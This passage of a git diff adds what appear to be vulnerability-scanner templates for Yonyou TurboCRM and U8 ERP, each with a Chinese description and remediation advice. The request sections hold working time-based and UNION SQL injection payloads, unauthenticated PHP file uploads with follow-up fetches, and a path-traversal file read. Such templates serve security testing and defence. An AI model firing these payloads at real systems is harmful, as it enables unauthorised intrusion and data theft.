multipart/form-data; boundary=---------------------------395196955720873782481927711505 + Content-Length: 255 + Connection: close + Cookie: PHPSESSID=2pghk16kb7ad240mdt3satr1d2 + Upgrade-Insecure-Requests: 1 + Sec-Fetch-Dest: document + Sec-Fetch-Mode: navigate + Sec-Fetch-Site: cross-site + Sec-Fetch-User: ?1 + + -----------------------------395196955720873782481927711505 + Content-Disposition: form-data; name="upfile"; filename="aa.php" + Content-Type: image/gif + + + -----------------------------395196955720873782481927711505-- + - "GET /Uploads/image/goods/{{replace(\"{{uploadFile}}\",\"\\\\/\",\"/\")}}.php + HTTP/1.1\nHost: {{Hostname}} \n" + req-condition: true diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/TruboCRM-sqli-forgetpswd.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/TruboCRM-sqli-forgetpswd.yaml" new file mode 100755 index 000000000..f7817202f --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/TruboCRM-sqli-forgetpswd.yaml" @@ -0,0 +1,40 @@ +id: TruboCRM-sqli-forgetpswd +info: + name: 用友TruboCRM管理系统 /login/forgetpswd.php 参数loginname 时间注入漏洞 + author: + - 折跃 + description: |- + 用友TruboCRM forgetpswd.php SQL注入漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/login/forgetpswd.php?ClearS=1&loginname=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0136925.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0136925.yaml" new file mode 100755 index 000000000..7d8eb974d --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0136925.yaml" @@ -0,0 +1,67 @@ +id: wooyun-2010-0136925 +info: + name: 用友CRM uploadfile任意文件上传 + author: + - 折跃 + description: |- + 用友CRM uploadfile任意文件上传漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_2==200 + - contains(body_2,verify) + extractors: + - name: uploadFile + type: regex + regex: + - (\w+.tmp.php) + group: 1 + part: body + internal: true + raw: + - | + POST /ajax/uploadfile.php?DontCheckLogin=1 HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP + Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0 + + ------WebKitFormBoundaryAVuAKsvesmnWtgEP + Content-Disposition: form-data; name="file"; filename="{{filename}}.php " + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryAVuAKsvesmnWtgEP + Content-Disposition: form-data; name="upload" + + upload + ------WebKitFormBoundaryAVuAKsvesmnWtgEP-- + - | + GET /tmpfile/{{uploadFile}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + filename: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0162149.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0162149.yaml" new file mode 100755 index 000000000..3558b5f1b --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0162149.yaml" @@ -0,0 +1,40 @@ +id: wooyun-2010-0162149 +info: + name: 用友TruboCRM管理系统reservationcomplete时间注入漏洞 + author: + - 折跃 + description: |- + 用友TruboCRM reservationcomplete.php SQL注入漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/background/reservationcomplete.php?DontCheckLogin=1&ID=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-076114.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-076114.yaml" new file mode 100755 index 000000000..9f4ab38f7 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-076114.yaml" @@ -0,0 +1,41 @@ +id: wooyun-2010-076114 +info: + name: 用友TruboCRM管理系统 /login/changepswd.php参数orgcode 时间注入漏洞 + author: + - 折跃 + description: |- + 用友TruboCRM changepswd.php SQL注入漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/login/changepswd.php?orgcode=1&loginname=system' + method: POST + body: submit=1&oldpassword=admin&password=admin&confirmpswd=admin&orgcode=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&loginname=system&key=-1 + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-083458.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-083458.yaml" new file mode 100755 index 000000000..3a026c620 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-083458.yaml" @@ -0,0 +1,61 @@ +id: wooyun-2010-083458 +info: + name: 用友TurboCRM多处SQL注入漏洞 + author: + - 折跃 + description: |- + 用友TurboCRM多处SQL注入漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - duration >= 5 + - '!contains(body,"background%2Ffestivalremind.php%3FID%3D")' + - '!contains(body,"background%2Fsmsstatusreport.php%3FID%3D1")' + - '!contains(body,"background%2Fonlinemeetingstatus.php%3FID%3D1")' + - '!contains(body,"background%2Fsendsms.php%3FID%3D1")' + - '!contains(body,"pub%2Fbgtaskreq.php%3Fsvr%3D1")' + - '!contains(body,"login%2Fforgetpswd.php%3Forgcode%3Dadmin")' + - '!contains(body,"background%2Frecievesms.php%3FID%3D1")' + - '!contains(body,"webservice%2Fservice.php%3Fclass%3DWS_System%26orgcode%3D1")' + - '!contains(body,"webservice%2Fservice.php%3Fclass%3DWS_System%26orgcode%3D1")' + path: + - '{{BaseURL}}/{{SqlPath}};%20WAITFOR%20DELAY%20%270:0:5%27--' + attack: batteringram + method: GET + payloads: + SqlPath: + - background/festivalremind.php?ID=1 + - background/smsstatusreport.php?ID=1 + - background/onlinemeetingstatus.php?ID=1 + - background/sendsms.php?ID=1 + - pub/bgtaskreq.php?svr=1 + - login/forgetpswd.php?orgcode=admin&loginname=admin + - background/recievesms.php?ID=1 + - webservice/service.php?class=WS_System&orgcode=1 + - background/festivalremind.php?ID=99999 + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137238.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137238.yaml" new file mode 100755 index 000000000..046171d2d --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137238.yaml" @@ -0,0 +1,67 @@ +id: wooyun-2015-0137238 +info: + name: 用友CRM swfupload任意文件上传 + author: + - 折跃 + description: |- + 用友CRM swfupload任意文件上传漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_2==200 + - contains(body_2,verify) + extractors: + - name: uploadFile + type: regex + regex: + - (\w+.tmp.php) + group: 1 + part: body + internal: true + raw: + - | + POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP + Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0 + + ------WebKitFormBoundaryAVuAKsvesmnWtgEP + Content-Disposition: form-data; name="file"; filename="{{filename}}.php " + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryAVuAKsvesmnWtgEP + Content-Disposition: form-data; name="upload" + + upload + ------WebKitFormBoundaryAVuAKsvesmnWtgEP-- + - | + GET /tmpfile/{{uploadFile}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + filename: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503.yaml" new file mode 100755 index 000000000..7c5aca85a --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503.yaml" @@ -0,0 +1,67 @@ +id: wooyun-2015-0137503 +info: + name: 用友CRM getemaildata任意文件上传 + author: + - 折跃 + description: |- + 用友CRM getemaildata任意文件上传漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_2==200 + - contains(body_2,verify) + extractors: + - name: num + type: regex + regex: + - mht(\d*)\.tmp\.mht + group: 1 + part: body + internal: true + raw: + - | + POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP + Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0 + + ------WebKitFormBoundaryAVuAKsvesmnWtgEP + Content-Disposition: form-data; name="file"; filename="{{filename}}.php " + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryAVuAKsvesmnWtgEP + Content-Disposition: form-data; name="upload" + + upload + ------WebKitFormBoundaryAVuAKsvesmnWtgEP-- + - | + GET /tmpfile/upd{{to_string(to_number(num)-1)}}.tmp.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + filename: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503_2.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503_2.yaml" new file mode 100755 index 000000000..c62e74cab --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503_2.yaml" @@ -0,0 +1,37 @@ +id: wooyun-2015-0137503_2 +info: + name: 用友CRM系统任意文件读取 + author: + - 折跃 + description: |- + 用友CRM 任意文件读取 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'patch3') + path: + - '{{BaseURL}}/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0162117.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0162117.yaml" new file mode 100755 index 000000000..42a0ef856 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0162117.yaml" @@ -0,0 +1,40 @@ +id: wooyun-2015-0162117 +info: + name: 用友TruboCRM管理系统SQL注入 + author: + - 折跃 + description: |- + 用友TruboCRM updateactivityemailnum.php SQL注入漏洞 + 用友CRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 + + 用友CRM存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1;%20waitfor%20delay%20%270:0:5%27--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-013006.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-013006.yaml" new file mode 100755 index 000000000..e8192de3f --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-013006.yaml" @@ -0,0 +1,43 @@ +id: wooyun-2015-013006 +info: + name: 用友U8 CmxcheckuserMachine.php SQL注入漏洞 + author: + - 折跃 + description: |- + 用友U8 CmxRemoteDesktop.php SQL注入漏洞 + 用友U8是一套全面集成了财务、生产制造及供应链的成熟应用,延伸客户管理至客户关系管理(CRM),并对于零售、分销领域实现了全面整合的企业级解决方案。 + + 用友U8存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + - '!contains(body,"Server%2FCmxcheckBind.php%3Fb%3D2%26a%3D1")' + - '!contains(body,"Server%2FCmxcheckuserMachine.php%3Fb%3D1%26a%3D1")' + path: + - '{{BaseURL}}/Server/CmxcheckBind.php?b=2&a=1%27%20and%201=2%20union%20select%20{{verify}}' + - '{{BaseURL}}/Server/CmxcheckuserMachine.php?b=1&a=1%27%20and%201=2%20union%20select%20{{verify}}' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-0157215.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-0157215.yaml" new file mode 100755 index 000000000..819befaa6 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-0157215.yaml" @@ -0,0 +1,41 @@ +id: wooyun-2015-0157215 +info: + name: 用友U8 CmxUser.php SQL注入漏洞 + author: + - 折跃 + description: |- + 用友U8 CmxUser.php SQL注入漏洞 + 用友U8是一套全面集成了财务、生产制造及供应链的成熟应用,延伸客户管理至客户关系管理(CRM),并对于零售、分销领域实现了全面整合的企业级解决方案。 + + 用友U8存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/Server/CmxUser.php?pgid=AddUser_Step4' + method: POST + body: UserName=test&AppID[]=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))PyGh) + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_1.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_1.yaml" new file mode 100755 index 000000000..7bd2ae3e2 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_1.yaml" @@ -0,0 +1,41 @@ +id: wooyun-2015-156891_1 +info: + name: 用友u8 CmxMailSet.php sql注入 + author: + - 折跃 + description: |- + 用友U8 CmxMailSet.php SQL注入漏洞 + 用友U8是一套全面集成了财务、生产制造及供应链的成熟应用,延伸客户管理至客户关系管理(CRM),并对于零售、分销领域实现了全面整合的企业级解决方案。 + + 用友U8存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 